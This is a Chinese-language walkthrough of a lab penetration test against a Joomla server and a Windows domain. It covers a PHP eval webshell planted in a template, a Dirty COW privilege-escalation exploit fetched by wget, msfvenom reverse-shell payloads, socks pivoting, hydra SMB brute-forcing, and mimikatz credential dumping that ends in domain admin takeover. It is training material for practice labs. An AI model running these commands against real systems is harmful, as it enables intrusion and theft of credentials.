红日安全内网靶场(三)渗透记录
红日安全内网靶场(三)渗透记录
前面环境搭建先省掉
目前收集到的信息
- 一台公网IP的web服务器(我这里是16.16.16.0的网段,16.16.16.160)
- 开放22、80、3306端口
- Joomla 3.9.12
- mysql5.7.27
- 敏感目录及文件
- 1.php——phpinfo页面(注意:disabled_function禁用了很多函数,后续webshell执行命令有影响)
- /administrator/——后台登录
- configuration.php~——配置文件的备份文件
- 数据库的连接账号及密码(testuser/cvcvgjASD!@)
- 数据库表前缀(am2zu_)
拿后台
因为3306开放,我们尝试在攻击机上直接连接数据库
cmd :mysql -u testuser -h 16.16.16.160 -p
// 回车后输入密码就进入了数据库
MySQL [joomla]>
MySQL [joomla]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.011 sec)
MySQL [joomla]> use joomla;
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.011 sec)
//结合之前在配置文件中数据库表前缀的信息,我们尝试查看下“am2zu_users”这个表,猜测就是用来存储后台账号的表
MySQL [joomla]> select * from am2zu_users;
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
2 rows in set (0.011 sec)
通过上网查阅Joomla密码加密相关资料,发现“$2y\(10\)t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2”密码是经过了password_hash($password, PASSWORD_BCRYPT);加密,并且未找到对应的解密方案。
并且通过burp抓包也尝试了爆破,也无果。在这个地方卡了许久。
后来查阅Joomla官方文档,上面有介绍到可以通过数据库直接插入来添加管理员账号,这不巧了。正好咱们有数据库的权限。
//https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
//其中下面sql语句中的jos31需要换成你实际的表前缀
INSERT INTO `jos31_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
//执行完这两条语句之后,我们就添加成功了一个管理员用户(账号:admin2,密码:secret)
通过连接:http://16.16.16.160/administrator/登录成功。
拿webshell
网上查阅joomla后台getshell,得知在后台的Extensions->Templates处可以通过修改模版php文件内容来getshell
具体操作为进入模版的编辑页面,修改index.php或者添加一个新的php文件,内容写上一句话<?php @eval($_POST['hack'])?>
拿蚁剑直接连上。
使用虚拟终端,发现命令无法执行,看来函数被禁用了。
实际测试,使用蚁剑的插件“PHP7 GC with Certain Destructors UAF”可以直接绕过限制。
但是是低账号权限
uid=33(www-data) gid=33(www-data) groups=33(www-data)
提权
尝试查看Linux版本信息
(www-data:/var/www/html/templates) $ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
(www-data:/var/www/html/templates) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
对内核4.4.0的Linux本地提权尝试了几个exp后都没有成功,僵持了很长时间,决定回头理下思路。
。。。
峰回路转,蚁剑翻目录,发现了/tmp/mysql目录下有个test.txt文件,打开一看是个账号密码的备份文件
adduser wwwuser
passwd wwwuser_123Aqx
直接ssh连
ssh wwwuser@16.16.16.160
连上发现是普通用户权限,现在再uname -a 一下
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
内核2.6.32,搜一下对应的exp
searchsploit linux 2.6 cow
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID M | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Meth | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd M | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
------------------------------------------------------------------------------------------------------------- ---------------------------------
多番尝试,使用linux/local/40839.c成功提权,具体步骤如下
1.先下载对应文件
searchsploit -m linux/local/40839.c
2.攻击机上用python开web
python3 -m http.server
3.在Linux机器上下载
wget http://16.16.16.160/40839.c
4.编译
gcc -pthread -o 40839 40839.c -lcrypt
5.执行
./40839
6.成功后会让你输入一个密码
7.成功创建一个root权限用户(firefart/yourpassword)
8.su firefart 输入密码即可
#ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:32:46:C9
inet addr:16.16.16.167 Bcast:16.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46c9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5074 errors:0 dropped:0 overruns:0 frame:0
TX packets:2521 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:684640 (668.5 KiB) TX bytes:692275 (676.0 KiB)
eth1 Link encap:Ethernet HWaddr 00:0C:29:32:46:D3
inet addr:192.168.93.100 Bcast:192.168.93.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46d3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43309 errors:0 dropped:0 overruns:0 frame:0
TX packets:519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4423428 (4.2 MiB) TX bytes:66073 (64.5 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:1#
转战msf
msfvenom -p python/meterpreter/reverse_tcp LHOST=16.16.16.160 LPORT=4444 -f raw -o payload.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 16.16.16.160
set LPORT 4444
run
# 获取到会话后
bg
# 设置路由
use post/multi/manage/autoroute
set session 1
run
# 开启socks5代理
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
开启socks代理后,在攻击机上用proxychainas测试下
# 配置好proxychains的socks5代理
# socks5 127.0.0.1 1080
proxychains curl http://192.168.93.100 # 该IP是内网IP地址,如果可以连接说明挂上了socks代理
# 在目前机器上执行ping,来查找内网存活主机
for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
192.168.93.1
192.168.93.10root
192.168.93.20
192.168.93.30
192.168.93.100(centos,反向代理ubuntu的web服务和数据库服务)
192.168.93.120(ubuntu,提供web服务)
从扫描出来的IP可以看出,一共有5台机器。
# nmap扫描对应的主机
proxychains nmap -sT -sV -Pn 192.168.93.10,20,30,100,120
192.168.93.120
------------------
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
192.168.93.10
------------------
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-03 06:55:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: TEST)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49155/tcp open unknown
49156/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Service Info: Host: WIN-8GA56TNV3MV; OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.93.20
----------------
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: TEST)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600; RTM
2383/tcp open ms-olap4?
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.92%I=7%D=3/3%Time=622068D9%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,5,"\x83\0\0\x01\x8f")%r(GenericLines,5,"\x83\0\0\x01\x8f")%r(HTT
SF:POptions,5,"\x83\0\0\x01\x8f")%r(RTSPRequest,5,"\x83\0\0\x01\x8f")%r(Fo
SF:urOhFourRequest,5,"\x83\0\0\x01\x8f")%r(LPDString,5,"\x83\0\0\x01\x8f")
SF:%r(LDAPSearchReq,5,"\x83\0\0\x01\x8f")%r(SIPOptions,5,"\x83\0\0\x01\x8f
SF:")%r(JavaRMI,5,"\x83\0\0\x01\x8f")%r(ms-sql-s,5,"\x83\0\0\x01\x8f");
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
192.168.93.30
-------------------
PORT STATE SERVICE VERSION
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: TEST)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.92%I=7%D=3/3%Time=62206BC8%P=x86_64-pc-linux-gnu%r(RPCC
SF:heck,5,"\x83\0\0\x01\x8f")%r(Help,5,"\x83\0\0\x01\x8f")%r(SSLSessionReq
SF:,5,"\x83\0\0\x01\x8f")%r(X11Probe,5,"\x83\0\0\x01\x8f");
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
根据nmap对192.168.93.10,20,30的扫描结果,我们归纳一下信息
10——大概率是域控,开了dns和ladp服务,域:test.org
20——Windows 2008 R2 域成员,mssql服务
30——Windows 7 域成员
先跑一下ms17-010,三个机器都不存在该漏洞,这下好了,还以为直接一把梭就完事儿。我们回过头再看下收集到的信息,发现IP20的机器开放了mssql服务,但是也没有账号阿。这时想到之前mysql的账号,想想撞一下,结果还真登录成了,但是是个guest低权限数据库账号,不会提权阿。
后来看了网上大佬们针对smb爆破成功,密码123qwe!ASD,我傻了。是我的字典太拉了嘛。还能说什么,赶紧把密码加入字典。=-=
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.20/ # 123qwe!ASD
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.30/ # 123qwe!ASD
现在的思路是msf生成一个Windows马,上传到192.168.93.20上执行反弹meterpreter,但是有个问题:192.168.93.20机器不出网。解决方案:通过centos(192.168.93.100)这台机器作为跳板机,做个端口转发,将kali攻击机的55555端口转发到跳板机的55555端口。这里我们使用ssh隧道来做,先ssh登录连上centos,然后执行以下命令:
// -C 压缩传输;-f 将ssh传输转入后台执行,不占用当前的shell;-N 建立静默连接; -g 允许远程主机连接本地用于转发的端口 -L 本地端口转发 16.16.16.182 kali攻击机IP
ssh -CfNg -L 55555:16.16.16.182:55555 root@16.16.16.182
端口转发做好了,我们用msf生成Windows马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.93.100 LPORT=55555 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o /root/55555.exe
//设置反弹到跳板机上,payload监听kali机即可
msf设置监听
msf
LHOST 16.16.16.182
LPORT 55555
我们可以使用kali上的smbclient进行连接,并上传生成的55555.exe
proxychains -q smbclient //192.168.93.20/c$ -U administrator
smb: \>put 55555.exe
通过impack工具套件中的wmiexec.py可以获取一个cmd会话:
proxychains -q python3 wmiexec.py administrator:123qwe\!ASD@192.168.93.20
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# 执行55555.exe
C:\>55555.exe(可能需要执行多遍才能成功)
以上做完,msf就获取到192.168.93.20的meterpreter会话了
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# migrate到一个SYSTEM的进程中
migrate xxxpid
# 加载kiwi
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator TEST fc5d63d71569f04399b41 18edd0cc3227be3bf61ce 0f058e319f079c15fe3449
9bc76e2eb34 198835a1d97 bbeffc086cfa4d231e
Administrator WIN2008 ae946ec6f4ca785b93371 31c1794c5aa8547c87a8b 128c0272959b85b3300906
dee1d5ee7e6 cd0324b8337 11169d07d85cb6bd0b
WIN2008$ TEST c47b1f47431b259861e61 5a09ade7dca624916c3947
5472864c698 3fd609c22302dd33bc
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST zxcASDqw123!!
Administrator WIN2008 123qwe!ASD
...
这就直接拉出域控账号密码了TEST\Administrator:zxcASDqw123!!
如果只是为了拿flag,直接smbclient登上去就行了
root@kali ~ proxychains -q smbclient -U administrator //192.168.93.10/c$
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\192.168.93.10\c$\
smb: \> cd Users/Administrator/Documents/
smb: \Users\Administrator\Documents\> ls
. DR 0 Thu Oct 31 00:52:43 2019
.. DR 0 Thu Oct 31 00:52:43 2019
desktop.ini AHS 402 Wed Oct 30 22:12:57 2019
flag.txt A 13 Thu Oct 31 00:53:16 2019
My Music DHSrn 0 Sun Oct 6 19:14:33 2019
My Pictures DHSrn 0 Sun Oct 6 19:14:33 2019
My Videos DHSrn 0 Sun Oct 6 19:14:33 2019
15728127 blocks of size 4096. 12293852 blocks available
smb: \Users\Administrator\Documents\>get flag.txt
smb: \Users\Administrator\Documents\>exit
root@kali ~ cat flag.txt
this is flag!#
如果想要在msf拿到meterpreter,可以和前面拿win2008机器一样的操作,将msf生成的55555.exe传上去执行,msf就会获得到meterpreter会话。
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 16.16.16.182:55555
[*] Sending stage (175174 bytes) to 16.16.16.182
[*] Meterpreter session 5 opened (16.16.16.182:55555 -> 16.16.16.182:45240 ) at 2022-03-09 19:18:08 +0800
meterpreter > sysinfo
Computer : WIN-8GA56TNV3MV
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : TEST
Logged On Users : 4
Meterpreter : x86/windows
meterpreter > getuid
Server username: TEST\Administrator
人间正道是沧桑
